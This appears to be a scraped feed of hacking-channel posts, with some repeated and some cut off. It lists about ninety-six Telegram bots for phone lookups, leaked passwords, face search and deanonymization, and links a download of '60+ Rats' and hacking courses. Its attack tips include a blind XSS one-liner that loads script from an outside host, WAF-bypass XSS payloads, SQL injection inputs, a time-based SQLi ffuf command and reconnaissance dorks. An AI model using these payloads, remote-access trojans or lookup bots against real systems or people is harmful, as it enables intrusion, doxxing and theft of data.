Termux All Command [Telegram Group]

if you wanna use old twitter interface try : https://chromewebstore.google.com/detail/old-twitter-layout-2024/jgejdcdoeeabklepnkdbglgccjpdgpmf

usefull osint bots 1. @phonenumberinformation_bot 2. @Quick_osintik_bot 3. @UniversalSearchRobot 4. @search_himera_bot 5. @Solaris_Search_Bot 6. @Zernerda_bot 7. @t_sys_bot 8. @OSINTInfoRobot 9. @LBSE_bot 10. @SovaAppBot 11. @poiskorcombot 12. @SEARCHUA_bot 13. @helper_inform_bot 14. @infobazaa_bot 15. @declassified_bot 16. @GHack_search_bot 17. @osint_databot 18. @Informator_BelBot 19. @HowToFindRU_Robot 20. @SEARCH2UA_bot 21. @UsersSearchBot 22. @BITCOlN_BOT 23. @ce_poshuk_bot 24. @BlackatSearchBot 25. @dataisbot 26. @n3fm4xw2rwbot 27. @cybersecdata_bot 28. @safe_search_bot 29. @getcontact_real_bot 30. @PhoneLeaks_bot 31. @useridinfobot 32. @mailcat_s_bot 33. @last4mailbot 34. @holehe_s_bot 35. @bmi_np_bot 36. @clerkinfobot 37. @kolibri_osint_bot 38. @getcontact_premium_bot 39. @phone_avito_bot 40. @pyth1a_0racle_bot 41. @olx_phone_bot 42. @ap_pars_bot 43. @SPOwnerBot 44. @regdatebot 45. @ibhldr_bot 46. @TgAnalyst_bot 47. @cryptoscanning_bot 48. @LinkCreatorBot 49. @telesint_bot 50. @Checknumb_bot 51. @TelpoiskBot_bot 52. @TgDeanonymizer_bot 53. @protestchat_bot 54. @locatortlrm_bot 55. @GetCont_bot 56. @usinfobot 57. @SangMataInfo_bot 58. @creationdatebot 59. @tgscanrobot 60. @InfoVkUser_bot 61. @getfb_bot 62. @GetOK2bot 63. @VKHistoryRobot 64. @detectiva_robot 65. @FindNameVk_bot 66. @vk2017robot 67. @AgentFNS_bot 68. @OpenDataUABot 69. @egrul_bot 70. @Bumz639bot 71. @ogrn_bot 72. @ShtrafKZBot 73. @egrnrobot 74. @VipiskaEGRNbot 75. @Search_firm_bot 76. @geomacbot 77. @pwIPbot 78. @ipscorebot 79. @ip_score_checker_bot 80. @FakeSMI_bot 81. @ipinfo_check_bot 82. @Search_IPbot 83. @WhoisDomBot 84. @vimebasebot 85. @maigret_osint_bot 86. @PasswordSearchBot 87. @ddg_stresser_bot 88. @BotAvinfo_bot 89. @reverseSearch2Bot 90. @pimeyesbot 91. @findfacerobot 92. @CarPlatesUkraineBot 93. @nomerogrambot 94. @ShtrafyPDRbot 95. @cerbersearch_bot 96. @EraOfHacking +__ @teamdarkarmy

Mega Hacking Courses (Video Tutorials With All Tools + Ebooks) 60+ Rats 80+ Tools 3+ Courses 100+ Ebooks Link For Download: https://mega.nz/folder/1cgAAKTQ#TsXutcd8w6GKFVfAJ_owaQ @teamdarkarmy

Google Dork - API Endpoints ⚙️ site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 Find juicy API Endpoints for further testing 🎯 site:example[.]com - Put your bug bounty target here! inurl:api - Finds URLs with "api". site:*/rest - Targets RESTful APIs. site:/v1 | site:/v2 | site:*/v3 - Looks for API version paths I used "site:" instead of "inurl:" because it removes false positives due to the way google queries work.

Credit: #Hacksnation Website Hacking Penetration Testing & Bug Bounty Hunting #Website #Hacking #Penetration #Testing #Bugbounty Hunting Like, Comment and share for others to #Learn #Rise and #shine https://lnkd.in/dv924p96

𝗕𝗹𝗶𝗻𝗱 𝗫𝗦𝗦 𝗶𝗻 𝗫-𝗙𝗼𝗿𝘄𝗮𝗿𝗱𝗲𝗱-𝗙𝗼𝗿 𝗛𝗲𝗮𝗱𝗲𝗿 findomain -t TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For" 𝗔𝗰𝗰𝗲𝘀𝘀 𝗢𝗻𝗲𝗹𝗶𝗻𝗲𝗿𝘀 𝗳𝗿𝗼𝗺 𝗚𝗶𝘁𝗵𝘂𝗯: https://lnkd.in/dZ7ZqGWG

Tip : Always check .js files for Extra 'Subdomains' grep -oE "[a-zA-Z0-9._-]+\.domain.com" file.js | sort -u | uniq | httpx -silent #bugbountytips

XSS Tip: If alert() is being converted to ALERT() and you can use Like ">

We're giving away our HTML & CSS course for free! https://www.pirple.com/free This class is 100% online and self-paced. It includes two dozen lectures, 6 quizzes, 4 homework assignments, a final exam, and a completion certificate.

Hackers from North Korea tricked people with fake job offers to spread a new virus called Kaolin RAT. This virus can change when files were last used and load other harmful software, making it easier for a dangerous virus called FudModule to get into computers.

Domain to IP : https://github.com/freelancermijan/domain-to-ip

Today I came across the world's most powerful XSS filter... "><𝗜𝗺𝗚+𝘀𝗿𝗰=𝘅+𝗼𝗻𝗲𝗿𝗿𝗼𝗿=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝟭)> (500 Internal Server Error, Bad guy) "><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> (200 OK, there's your XSS injected dear attacker 😂 )

Stored Xss on Private bug bounty program at hacker one. Payload for bypass waf:

#bugbountytips Find and detect time based SQLi with ffuf Payloads: https://lnkd.in/dDX9zkN4 Command: ffuf -u "https://HOST/Less-10/?id=FUZZ" -w ~/pentest/SQLi_Sleeps/data.txt -mt ">20000" -enc FUZZ:urlencode -timeout 150 -v

Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com 🎯 Target domain here: site:example[.]com 🚨 Common server errors in the page titles: intitle:"exception" | intitle:"failure" 🔧 Error messages in URLs: inurl:"error" | inurl:exception 🔍 More error messages: "database error" | "SQL syntax" | "undefined index" SQL Injection 🐍 Input ' OR 1=1; -- in form fields/URLs. Cross-Site Scripting (XSS) 📌 Inject '"> in parameters, forms, path. Server-Side Request Forgery (SSRF) 🌐 Put your Burp Collaborator URL everywhere and see if it calls back.

Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com 🎯 Target domain here: site:example[.]com 🚨 Common server errors in the page titles: intitle:"exception" | intitle:"failure" 🔧 Error messages in URLs: inurl:"error" | inurl:exception 🔍 More error messages: "database error" | "SQL syntax" | "undefined index" SQL Injection 🐍 Input ' OR 1=1; -- in form fields/URLs. Cross-Site Scripting (XSS) 📌 Inject '"> in parameters, forms, path. Server-Side Request Forgery (SSRF) 🌐 Put your Burp Collaborator URL everywhere and see if it calls back.

These are all of the resources I used to pass the OSCP in 8 hours on my first try. OSCP Write-Ups/Notebooks: - https://lnkd.in/gi8hijVT - https://lnkd.in/ggPFB9-P - https://lnkd.in/gYK7zMBW - https://lnkd.in/gX4rSMy4 - https://lnkd.in/gqhZpgN9 - https://lnkd.in/g6ERW7HA - https://lnkd.in/gFgqcU_t - https://lnkd.in/gCH8sJcr - https://lnkd.in/gPbp-FMk Courses (Ordered by How I Completed Them): - The Cyber Mentor's free Youtube playlist https://lnkd.in/gUNep82i - IppSec's videos over Hack the Box https://lnkd.in/gkqR8Tky - Metasploit Unleashed https://lnkd.in/g8sJvEKF - TryHackMe (at least complete the complete beginner, offensive pentesting, and the web fundamentals paths for the best preparation) https://lnkd.in/gh4FcxMi - TryHackMe Buffer Overflow Preparation https://lnkd.in/g2UskdJY - Linux Privilege Escalation for Beginners https://lnkd.in/g4u2cWTK - Linux Privilege Escalation for OSCP & Beyond! https://lnkd.in/gNU9eYDt - Windows Privilege Escalation for Beginners https://lnkd.in/g4u2cWTK - Windows Privilege Escalation for OSCP & Beyond! https://lnkd.in/gNU9eYDt - Virtual Hacking Labs (can be skipped if it is outside of the budget) https://lnkd.in/gpSVAdYQ - Proving Grounds Practice https://lnkd.in/gnZcqs64 Courses Unrelated to the OSCP: - Ethical Hacking with Metasploit: Exploit & Post Exploit https://lnkd.in/gwkSWa3q - Open-Source Intelligence (OSINT) Fundamentals https://lnkd.in/gGh4pE3r - PortSwigger Academy https://lnkd.in/gwCGhYkq) Python Resources: - Black Hat Python: Python Programming for Hackers and Pentesters - Cybrary's Python Course https://lnkd.in/gBFiXKsn - Code Academy's Python Course https://lnkd.in/g5buSg4z - Python Cheat Sheet https://lnkd.in/gRRmx3-e Powershell Resources: - PowerShell Playlist https://lnkd.in/gKgYx3uc - Microsoft Verb-age Docs https://lnkd.in/gBhziH-k - Red Team One-Liners https://lnkd.in/gyqbfNMN) Unofficial OSCP Approved Tools: - https://lnkd.in/g8wkxHzM VMs: - Windows: Commando VM https://lnkd.in/gaXHynuN - Linux: Kali Linux https://www.kali.org

Today I came across the world's most powerful XSS filter... "><𝗜𝗺𝗚+𝘀𝗿𝗰=𝘅+𝗼𝗻𝗲𝗿𝗿𝗼𝗿=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝟭)> (500 Internal Server Error, Bad guy) "><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> (200 OK, there's your XSS injected dear attacker 😂 ) #bugbounty #bugbountytip #webhacking